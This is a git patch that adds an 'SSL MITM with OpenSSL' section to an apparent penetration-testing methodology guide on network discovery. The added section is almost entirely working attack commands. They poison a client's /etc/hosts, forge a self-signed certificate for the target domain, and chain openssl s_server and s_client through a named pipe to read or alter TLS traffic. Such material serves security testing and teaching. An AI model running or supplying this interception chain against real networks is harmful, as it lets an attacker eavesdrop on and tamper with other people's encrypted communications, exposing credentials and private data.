From 230f8c368860f537bf888d6d67a86a2eaeb6997b Mon Sep 17 00:00:00 2001
From: CravateRouge <baptiste.crepin@ntymail.com>
Date: Thu, 19 Jan 2023 16:33:11 +0100
Subject: [PATCH] Add SSL MITM using OpenSSL

---
 Methodology and Resources/Network Discovery.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md
index c296724..b76dd23 100644
--- a/Methodology and Resources/Network Discovery.md	
+++ b/Methodology and Resources/Network Discovery.md	
@@ -9,6 +9,7 @@
 - [Responder](#responder)
 - [Bettercap](#bettercap)
 - [Reconnoitre](#reconnoitre)
+- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl)
 - [References](#references)
 
 ## Nmap
@@ -196,6 +197,23 @@ bettercap -X --proxy --proxy-https -T <target IP>
 # targetting specific IP only
 ```
 
+## SSL MITM with OpenSSL
+This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl.
+If you can modify `/etc/hosts` of the client:
+```powershell
+sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts  # On client host
+```
+On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server):
+```powershell
+openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem
+```
+On our MITM server, we setup our infra:
+```powershell
+mkfifo response
+sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response
+```
+In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example.
+
 ## References
 
 * [TODO](TODO)